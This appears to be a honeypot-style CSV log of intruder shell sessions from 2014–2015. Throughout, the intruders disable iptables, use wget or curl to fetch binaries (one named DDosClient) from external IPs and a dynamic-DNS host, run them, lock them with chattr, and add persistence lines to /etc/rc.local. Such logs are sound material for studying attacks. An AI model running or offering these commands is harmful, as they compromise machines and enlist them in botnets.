192,"d7f6705068cc11e4b3d002b6d5d64ab8","2014-11-10 11:30:17",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
193,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:45",\N,0,"service iptables stop"
194,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:50",\N,1,"wget http://222.186.34.123:8889/mu24"
195,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:11:55",\N,1,"chmod u+x mu24"
196,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:00",\N,0,"./mu24 &"
197,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:05",\N,1,"cd /tmp"
198,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
199,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:15",\N,1,"echo \"./mu24&\">>/etc/rc.local"
200,"84423d5a699311e4b3d002b6d5d64ab8","2014-11-11 11:12:20",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
201,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:22:12",\N,1,"w"
202,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:22:16",\N,1,"uname -a"
203,"2c2d946c6a4611e4b3d002b6d5d64ab8","2014-11-12 08:30:42",\N,1,"echo \"WinSCP: this is end-of-file:0\""
204,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:32:55",\N,0,"54.69.25.214"
205,"fb2cea306a4411e4b3d002b6d5d64ab8","2014-11-12 08:32:57",\N,0,"netstat"
206,"81d5ad7c6b4611e4b273024542c06214","2014-11-13 15:05:33",\N,1,"echo \"WinSCP: this is end-of-file:0\""
207,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:14",\N,1,"ls"
208,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:16",\N,1,"cd .."
209,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:17",\N,1,"ls"
210,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:20",\N,1,"cat /etc/passwd"
211,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:21",\N,1,"ls"
212,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:27",\N,1,"exit"
213,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:29",\N,1,"exit"
214,"840a88a86b7611e4b3d002b6d5d64ab8","2014-11-13 20:49:31",\N,0,"quit"
215,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:10",\N,1,"wget www.google.com"
216,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:13",\N,0,"quit"
217,"a471a9646b7611e4b3d002b6d5d64ab8","2014-11-13 20:50:15",\N,1,"exit"
218,"2fba19506e9e11e4b3d002b6d5d64ab8","2014-11-17 21:10:47",\N,1,"ls"
219,"2fba19506e9e11e4b3d002b6d5d64ab8","2014-11-17 21:10:52",\N,1,"cat /etc/passwd"
220,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:27",\N,1,"ls"
221,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:29",\N,1,"exit"
222,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:31",\N,0,"quit"
223,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:33",\N,1,"exit"
224,"6cabd6a4702511e4b3d002b6d5d64ab8","2014-11-19 19:51:41",\N,1,"exit"
225,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:26",\N,0,"service iptables stop"
226,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:30",\N,1,"wget http://111.73.45.158:881/a54321"
227,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:34",\N,1,"chmod 0777 a54321"
228,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:38",\N,0,"./a54321 &"
229,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:42",\N,1,"chattr +i a54321"
230,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:46",\N,1,"wget http://111.73.45.158:881/b54321"
231,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:50",\N,1,"chmod 0777 b54321"
232,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:54",\N,0,"./b54321 &"
233,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:51:58",\N,1,"chattr +i b54321"
234,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:02",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
235,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:06",\N,1,"echo \"./a54321&\">>/etc/rc.local"
236,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:10",\N,1,"echo \"./b54321&\">>/etc/rc.local"
237,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:14",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
238,"e5fb6a1e712011e4b3d002b6d5d64ab8","2014-11-21 01:52:18",\N,1,"whoami"
239,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:47",\N,0,"service iptables stop"
240,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:51",\N,1,"wget http://111.73.45.158:881/a54321"
241,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:55",\N,1,"chmod 0777 a54321"
242,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:56:59",\N,0,"./a54321 &"
243,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:03",\N,1,"chattr +i a54321"
244,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:07",\N,1,"wget http://111.73.45.158:881/b54321"
245,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:11",\N,1,"chmod 0777 b54321"
246,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:15",\N,0,"./b54321 &"
247,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:19",\N,1,"chattr +i b54321"
248,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:23",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
249,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:27",\N,1,"echo \"./a54321&\">>/etc/rc.local"
250,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:31",\N,1,"echo \"./b54321&\">>/etc/rc.local"
251,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:35",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
252,"efe5bd3a715311e4b3d002b6d5d64ab8","2014-11-21 07:57:39",\N,1,"whoami"
253,"f5727b5c746511e4b3d002b6d5d64ab8","2014-11-25 05:43:35",\N,1,"ps -ef"
254,"f5727b5c746511e4b3d002b6d5d64ab8","2014-11-25 05:43:39",\N,1,"pwd"
255,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:35",\N,1,"ls"
256,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:37",\N,1,"pwd"
257,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:38",\N,1,"ifconfig"
258,"4d99df0474e911e4b3d002b6d5d64ab8","2014-11-25 21:23:50",\N,1,"wget http://222.186.31.11:1/lan2.6"
259,"337bfaf47c6811e4b3d002b6d5d64ab8","2014-12-05 10:19:40",\N,1,"uname -a"
260,"1a59dfa87ce711e4b3d002b6d5d64ab8","2014-12-06 01:28:12",\N,1,"uname -a"
261,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:27",\N,0,"/etc/init.d/iptables stop"
262,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:31",\N,0,"service iptables stop"
263,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:35",\N,0,"SuSEfirewall2 stop"
264,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:39",\N,0,"reSuSEfirewall2 stop"
265,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:43",\N,1,"wget http://115.239.224.241:11111/slan"
266,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:47",\N,1,"chmod 0777 slan"
267,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:51",\N,0,"./slan &"
268,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:55",\N,1,"chattr +i slan"
269,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:51:59",\N,1,"wget http://115.239.224.241:11111/ulan"
270,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:03",\N,1,"chmod 0777 ulan"
271,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:07",\N,0,"./ulan &"
272,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:11",\N,1,"chattr +i ulan"
273,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:15",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
274,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:19",\N,1,"echo \"./slan&\">>/etc/rc.local"
275,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:23",\N,1,"echo \"./ulan&\">>/etc/rc.local"
276,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:27",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
277,"2f05bf1284df11e4b3d002b6d5d64ab8","2014-12-16 04:52:31",\N,1,"whoami"
278,"f3a68c26859711e4b3d002b6d5d64ab8","2014-12-17 02:54:18",\N,1,"w"
279,"f3a68c26859711e4b3d002b6d5d64ab8","2014-12-17 02:54:21",\N,1,"ps -ef"
280,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:23:49",\N,1,"ls"
281,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:23:52",\N,1,"pwd"
282,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:23:58",\N,1,"cd /"
283,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:24:03",\N,1,"ls"
284,"ede9c67089fe11e4b3d002b6d5d64ab8","2014-12-22 17:24:05",\N,1,"exit"
285,"440926508a0311e4af3102b6d5d64ab8","2014-12-22 17:52:51",\N,0,"test"
286,"440926508a0311e4af3102b6d5d64ab8","2014-12-22 17:52:53",\N,0,"something"
287,"440926508a0311e4af3102b6d5d64ab8","2014-12-22 17:52:54",\N,1,"exit"
288,"3652f0508ab611e4af3102b6d5d64ab8","2014-12-23 15:13:29",\N,1,"uname -a"
289,"3652f0508ab611e4af3102b6d5d64ab8","2014-12-23 15:13:43",\N,1,"wget http://121.40.19.239:52365/DDosClient"
290,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:17:50",\N,0,"service iptables stop"
291,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:17:54",\N,1,"wget http://115.239.248.208:5252/Gates"
292,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:17:58",\N,1,"chmod 0777 Gates"
293,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:02",\N,0,"./Gates &"
294,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:06",\N,1,"chattr +i Gates"
295,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
296,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:14",\N,1,"echo \"./Gates&\">>/etc/rc.local"
297,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:18",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
298,"5e841d30944611e4af3102b6d5d64ab8","2015-01-04 19:18:22",\N,1,"whoami"
299,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:10",\N,0,"service iptables stop"
300,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:14",\N,1,"wget http://115.239.248.208:5252/Gates2.4"
301,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:18",\N,1,"chmod 0777 Gates2.4"
302,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:22",\N,0,"./Gates2.4 &"
303,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:26",\N,1,"chattr +i Gates2.4"
304,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:30",\N,1,"wget http://115.239.248.208:5252/GatesFreeBsd"
305,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:34",\N,1,"chmod 0777 GatesFreeBsd"
306,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:38",\N,0,"./GatesFreeBsd &"
307,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:42",\N,1,"chattr +i GatesFreeBsd"
308,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:46",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
309,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:50",\N,1,"echo \"./Gates2.4&\">>/etc/rc.local"
310,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:54",\N,1,"echo \"./GatesFreeBsd&\">>/etc/rc.local"
311,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:40:58",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
312,"df38ff44945111e4af3102b6d5d64ab8","2015-01-04 20:41:02",\N,1,"whoami"
313,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:47",\N,1,"ls"
314,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:50",\N,1,"cd /"
315,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:50",\N,1,"ls"
316,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:01:57",\N,1,"cat /etc/passwd"
317,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:02:01",\N,1,"exit"
318,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:02:04",\N,0,"testing"
319,"5eff2ef6a01e11e4af3102b6d5d64ab8","2015-01-19 21:02:06",\N,0,"testing"
320,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:16:17",\N,0,"ip"
321,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:16:21",\N,1,"ifconfig"
322,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:16:34",\N,1,"wget h5tt"
323,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:17:03",\N,1,"wget http://216.99.157.168:8080/meng"
324,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:17:19",\N,1,"wget http://216.99.157.168:8080/meng"
325,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:17:38",\N,1,"wget http://216.99.157.168:8080/jin1"
326,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:18:38",\N,1,"wget http://216.99.157.168:8080/xixi"
327,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:19:05",\N,1,"ps -ef | grep libvirtdsdd"
328,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:19:35",\N,0,"ethtool eth0"
329,"4814c1acab8511e4af3102b6d5d64ab8","2015-02-03 09:19:43",\N,1,"ps -aux"
330,"42c7255eab8611e4af3102b6d5d64ab8","2015-02-03 09:23:27",\N,1,"wget http://216.99.157.168:8080/meng"
331,"1e6f1ff8aba511e4af3102b6d5d64ab8","2015-02-03 13:04:09",\N,1,"uptime"
332,"1e6f1ff8aba511e4af3102b6d5d64ab8","2015-02-03 13:04:19",\N,1,"ifconfig"
333,"96d8e21ead0111e4af3102b6d5d64ab8","2015-02-05 06:38:29",\N,1,"wget http://121.41.88.50:88/AliApp"
334,"96d8e21ead0111e4af3102b6d5d64ab8","2015-02-05 06:38:33",\N,1,"chmod 777 AliApp"
335,"96d8e21ead0111e4af3102b6d5d64ab8","2015-02-05 06:38:37",\N,0,"./AliApp"
336,"30862ab2b93611e4af3102b6d5d64ab8","2015-02-20 19:25:22",\N,1,"w"
337,"6442e138b93611e4af3102b6d5d64ab8","2015-02-20 19:26:46",\N,1,"w"
338,"e0477ef6b98611e4af3102b6d5d64ab8","2015-02-21 05:02:59",\N,1,"cd /tmp"
339,"e0477ef6b98611e4af3102b6d5d64ab8","2015-02-21 05:03:08",\N,1,"wget http://183.136.213.96:8090/10091"
340,"9c3b27c2bcc311e4af3102b6d5d64ab8","2015-02-25 07:55:12",\N,1,"uname -a"
341,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:27",\N,1,"rm *"
342,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:31",\N,0,"curl -o /tmp/gnkk-d http://222.186.52.53:3377/gnkk-d"
343,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:35",\N,1,"wget -c http://hackerxxy.3322.org:3377/gnkk-d"
344,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:39",\N,1,"chmod 777 /tmp/./gnkk-d"
345,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:43",\N,1,"chmod 777 /tmp/gnkk-d"
346,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:47",\N,0,"/tmp/./gnkk-d"
347,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:51",\N,0,"/tmp/gnkk-d"
348,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:55",\N,1,"cd /tmp"
349,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:03:59",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
350,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:03",\N,1,"echo \"./gnkk-d&\">>/etc/rc.local"
351,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:07",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
352,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:11",\N,1,"rm /tmp/*"
353,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:15",\N,1,"wget http://hackerxxy.3322.org:3377/xy-32"
354,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:19",\N,1,"chmod 777 xy-32"
355,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:23",\N,1,"chmod u+x xy-32"
356,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:27",\N,0,"./xy-32&"
357,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:31",\N,1,"nohup /root/xy-32& > /dev/null 2>&1 &"
358,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:35",\N,1,"cd /tmp"
359,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:39",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
360,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:43",\N,1,"echo \"./xy-32&\">>/etc/rc.local"
361,"1403b56ecaaf11e4af3102b6d5d64ab8","2015-03-15 01:04:47",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
362,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:52:50",\N,0,"service iptables stop"
363,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:52:54",\N,1,"wget wget http://222.186.31.73:8080/Manager"
364,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:52:58",\N,1,"chmod 0777 Manager"
365,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:02",\N,0,"./Manager &"
366,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:06",\N,1,"chattr +i Manager"
367,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:10",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
368,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:14",\N,1,"echo \"./Manager&\">>/etc/rc.local"
369,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:18",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
370,"f60ebe3acbd211e4af3102b6d5d64ab8","2015-03-16 11:53:22",\N,1,"whoami"
371,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:13:47",\N,1,"wget http://218.244.148.238:8080/bin.sh"
372,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:00",\N,1,"chmod 0755 ./bin.sh"
373,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:11",\N,1,"nohup ./bin.sh> /dev/null 2>&1 &"
374,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:23",\N,0,"curl http://218.244.148.238:8080/npc -o /tmp/npc"
375,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:35",\N,1,"chmod 0755 /tmp/./npc"
376,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:47",\N,0,"/tmp/./npc"
377,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:14:59",\N,1,"wget http://218.244.148.238:8080/npc"
378,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:11",\N,1,"chmod 0755 ./npc"
379,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:23",\N,0,"./npc"
380,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:35",\N,0,"curl http://218.244.148.238:8080/npc1 -o /tmp/npc1"
381,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:47",\N,1,"chmod 0755 /tmp/./npc1"
382,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:15:59",\N,0,"/tmp/./npc1"
383,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:16:11",\N,1,"wget http://218.244.148.238:8080/npc1"
384,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:16:23",\N,1,"chmod 0755 ./npc1"
385,"e5124e1ecbd511e4af3102b6d5d64ab8","2015-03-16 12:16:35",\N,0,"./npc1"
386,"495dc05acd8a11e4af3102b6d5d64ab8","2015-03-18 16:17:38",\N,1,"wget -O /tmp/Gatesz http://61.147.121.113:3221/Gatesz"
387,"bb9120bad17a11e4af3102b6d5d64ab8","2015-03-23 16:36:40",\N,1,"echo \"WinSCP: this is end-of-file:0\""
388,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:44",\N,0,"service iptables stop"
389,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:48",\N,1,"wget http://117.21.176.54:9191/choushabi"
390,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:52",\N,1,"chmod 0755 /root/choushabi"
391,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:10:56",\N,1,"nohup /root/choushabi > /dev/null 2>&1 &"
392,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:00",\N,1,"chmod 777 choushabi"
393,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:04",\N,0,"./choushabi"
394,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:08",\N,1,"chmod 0755 /root/choushabi"
395,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,1,"nohup /root/choushabi &gt"
396,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,0,"/dev/null 2&gt"
397,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,0,"&amp"
398,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:12",\N,0,"1 &amp"
399,"7ff0dcb8d1ec11e4af3102b6d5d64ab8","2015-03-24 06:11:16",\N,1,"chmod 0777 choushabi"
400,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:08",\N,0,"service iptables stop"
401,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:12",\N,1,"wget http://117.21.176.54:9191/choushabi"
402,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:16",\N,1,"chmod 0755 /root/choushabi"
403,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:20",\N,1,"nohup /root/choushabi > /dev/null 2>&1 &"
404,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:24",\N,1,"chmod 777 choushabi"
405,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:28",\N,0,"./choushabi"
406,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:32",\N,1,"chmod 0755 /root/choushabi"
407,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,1,"nohup /root/choushabi &gt"
408,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,0,"/dev/null 2&gt"
409,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,0,"&amp"
410,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:36",\N,0,"1 &amp"
411,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:40",\N,1,"chmod 0777 choushabi"
412,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:44",\N,1,"chmod u+x choushabi"
413,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:48",\N,0,"./choushabi &"
414,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:52",\N,1,"chmod u+x choushabi"
415,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:12:56",\N,0,"./choushabi &"
416,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:00",\N,1,"cd /tmp"
417,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:04",\N,0,"service iptables stop"
418,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:08",\N,1,"wget http://117.21.176.54:9191/choushabi"
419,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:12",\N,1,"chmod 0755 /root/choushabi"
420,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:16",\N,1,"nohup /root/choushabi > /dev/null 2>&1 &"
421,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:20",\N,1,"chmod 777 choushabi"
422,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:24",\N,0,"./choushabi"
423,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:28",\N,1,"chmod 0755 /root/choushabi"
424,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,1,"nohup /root/choushabi &gt"
425,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,0,"/dev/null 2&gt"
426,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,0,"&amp"
427,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:32",\N,0,"1 &amp"
428,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:36",\N,1,"chmod 0777 choushabi"
429,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:40",\N,1,"chmod u+x choushabi"
430,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:44",\N,0,"./choushabi &"
431,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:48",\N,1,"chmod u+x choushabi"
432,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:52",\N,0,"./choushabi &"
433,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:13:56",\N,1,"cd /tmp"
434,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:00",\N,1,"echo \"cd  /root/\">>/etc/rc.local"
435,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:04",\N,1,"echo \"./choushabi&\">>/etc/rc.local"
436,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:08",\N,1,"echo \"./choushabi&\">>/etc/rc.local"
437,"b0aa3b9cd1ec11e4af3102b6d5d64ab8","2015-03-24 06:14:12",\N,1,"echo \"/etc/init.d/iptables stop\">>/etc/rc.local"
438,"636a9522d30711e4af3102b6d5d64ab8","2015-03-25 15:55:46",\N,0,"/etc/init.d/iptables stopservice iptables stop"
